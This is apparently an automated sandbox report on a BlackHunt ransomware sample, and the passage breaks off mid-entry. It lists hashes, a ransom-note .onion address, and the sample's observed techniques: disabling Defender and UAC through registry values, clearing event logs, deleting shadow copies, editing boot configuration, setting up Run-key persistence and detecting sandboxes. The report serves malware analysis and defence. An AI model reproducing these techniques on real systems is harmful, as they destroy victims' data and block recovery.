Analysis
-
max time kernel
92s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
19-01-2024 00:57
Static task
static1
Behavioral task
behavioral1
Sample
ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe
Resource
win10v2004-20231215-en
General
-
Target
ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe
-
Size
707KB
-
MD5
801ff340c5ce9858f52138ad4aaf7b6e
-
SHA1
2cf78c35a2c468024ec1a18a3aac93822c9b306d
-
SHA256
ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4
-
SHA512
41cac5b193651601af31f50652bf5394f8ae7585337fc13a444687d847ea08de66ee177227537e8274b399ded0cf22fc3dbc0b55ae33d4808ec0f0004ab6061d
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1U8Jvnh:6uaTmkZJ+naie5OTamgEoKxLW3th
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 7060 fsutil.exe 6328 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 9228 wevtutil.exe 13384 wevtutil.exe 10128 wevtutil.exe 7844 wevtutil.exe 10196 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 10416 bcdedit.exe 9280 bcdedit.exe 12576 bcdedit.exe 1504 bcdedit.exe -
Renames multiple (3369) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 7284 wbadmin.exe 11136 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\R: ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened (read-only) \??\A: ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\S: ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened (read-only) \??\P: ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened (read-only) \??\L: ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened (read-only) \??\B: ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened (read-only) \??\M: ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\T: ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened (read-only) \??\Y: ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened (read-only) \??\G: ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened (read-only) \??\J: ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened (read-only) \??\X: ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened (read-only) \??\O: ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened (read-only) \??\N: ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\U: ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened (read-only) \??\K: ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened (read-only) \??\Z: ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened (read-only) \??\V: ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened (read-only) \??\Q: ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened (read-only) \??\W: ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened (read-only) \??\E: ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened (read-only) \??\I: ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened (read-only) \??\H: ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened (read-only) \??\F: vssadmin.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-gb\#BlackHunt_ReadMe.hta ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\am_get.svg ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\#BlackHunt_ReadMe.hta ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_move_18.svg ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_folder-down_32.svg ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hr-hr\#BlackHunt_ReadMe.txt ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sk-sk\#BlackHunt_ReadMe.txt ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sk-sk\ui-strings.js ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files\Java\jdk-1.8\legal\javafx\#BlackHunt_Private.key ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\selector.js ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sv-se\#BlackHunt_ReadMe.txt ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\es-es\#BlackHunt_ReadMe.hta ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\de-de\#BlackHunt_ReadMe.txt ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-de_de_2x.gif ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\it-it\#BlackHunt_ReadMe.txt ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\help.svg ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ar-ae\#BlackHunt_Private.key ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ja-jp\#BlackHunt_ReadMe.hta ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\#BlackHunt_ReadMe.txt ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\#BlackHunt_Private.key ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\#BlackHunt_ReadMe.txt ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\#BlackHunt_Private.key ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files\VideoLAN\VLC\locale\te\#BlackHunt_ReadMe.hta ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\nl-nl\ui-strings.js ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pt-br\#BlackHunt_Private.key ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\sv-se\#BlackHunt_Private.key ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sortedby_hover_18.svg ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\digsig_icons_2x.png ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-gb\#BlackHunt_ReadMe.hta ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\root\ui-strings.js ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\de-de\ui-strings.js ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\it-it\#BlackHunt_ReadMe.hta ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\illustrations.png ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\#BlackHunt_Private.key ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ko-kr\ui-strings.js ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\nl-nl\#BlackHunt_Private.key ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\da-dk\#BlackHunt_ReadMe.hta ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\#BlackHunt_Private.key ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\PFM\zy______.pfm ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\cryptix.md ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\cs-cz\#BlackHunt_Private.key ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\cs-cz\#BlackHunt_ReadMe.txt ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\#BlackHunt_ReadMe.hta ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\de-de\#BlackHunt_ReadMe.txt ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\hr-hr\#BlackHunt_ReadMe.txt ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files\dotnet\host\fxr\#BlackHunt_Private.key ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\#BlackHunt_ReadMe.txt ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\it-it\ui-strings.js ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\#BlackHunt_ReadMe.txt ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-tw\#BlackHunt_Private.key ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\root\#BlackHunt_ReadMe.hta ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\#BlackHunt_ReadMe.hta ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\root\#BlackHunt_ReadMe.txt ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Info.png ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\amd64\#BlackHunt_Private.key ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hu-hu\ui-strings.js ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\es-es\#BlackHunt_Private.key ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\xalan.md ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\#BlackHunt_ReadMe.txt ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File created C:\Program Files\VideoLAN\VLC\lua\modules\#BlackHunt_ReadMe.hta ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\new_icons.png ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\ru_get.svg ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-cn\ui-strings.js ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 12384 7412 WerFault.exe 292 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 8764 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 8612 vssadmin.exe 6396 vssadmin.exe 7176 vssadmin.exe 8940 vssadmin.exe 5984 vssadmin.exe 368 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 13592 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\Local Settings cmd.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 13172 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe Token: SeRestorePrivilege 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe Token: SeBackupPrivilege 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe Token: SeTakeOwnershipPrivilege 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe Token: SeAuditPrivilege 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe Token: SeSecurityPrivilege 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe Token: SeIncBasePriorityPrivilege 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe Token: SeBackupPrivilege 6544 vssvc.exe Token: SeRestorePrivilege 6544 vssvc.exe Token: SeAuditPrivilege 6544 vssvc.exe Token: SeBackupPrivilege 12676 wbengine.exe Token: SeRestorePrivilege 12676 wbengine.exe Token: SeSecurityPrivilege 12676 wbengine.exe Token: SeSecurityPrivilege 10196 wevtutil.exe Token: SeBackupPrivilege 10196 wevtutil.exe Token: SeSecurityPrivilege 7844 wevtutil.exe Token: SeBackupPrivilege 7844 wevtutil.exe Token: SeSecurityPrivilege 9228 wevtutil.exe Token: SeBackupPrivilege 9228 wevtutil.exe Token: SeSecurityPrivilege 13384 wevtutil.exe Token: SeBackupPrivilege 13384 wevtutil.exe Token: SeSecurityPrivilege 10128 wevtutil.exe Token: SeBackupPrivilege 10128 wevtutil.exe Token: SeDebugPrivilege 13592 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4288 wrote to memory of 4524 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 90 PID 4288 wrote to memory of 4524 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 90 PID 4288 wrote to memory of 4568 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 91 PID 4288 wrote to memory of 4568 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 91 PID 4288 wrote to memory of 2264 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 94 PID 4288 wrote to memory of 2264 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 94 PID 4288 wrote to memory of 3448 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 96 PID 4288 wrote to memory of 3448 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 96 PID 4288 wrote to memory of 1076 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 97 PID 4288 wrote to memory of 1076 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 97 PID 4288 wrote to memory of 4468 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 99 PID 4288 wrote to memory of 4468 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 99 PID 4524 wrote to memory of 2916 4524 cmd.exe 102 PID 4524 wrote to memory of 2916 4524 cmd.exe 102 PID 4568 wrote to memory of 2876 4568 cmd.exe 103 PID 4568 wrote to memory of 2876 4568 cmd.exe 103 PID 4288 wrote to memory of 3196 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 104 PID 4288 wrote to memory of 3196 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 104 PID 4288 wrote to memory of 5056 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 110 PID 4288 wrote to memory of 5056 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 110 PID 4288 wrote to memory of 3296 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 107 PID 4288 wrote to memory of 3296 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 107 PID 2264 wrote to memory of 4892 2264 cmd.exe 109 PID 2264 wrote to memory of 4892 2264 cmd.exe 109 PID 3448 wrote to memory of 4936 3448 cmd.exe 112 PID 3448 wrote to memory of 4936 3448 cmd.exe 112 PID 4288 wrote to memory of 2128 4288 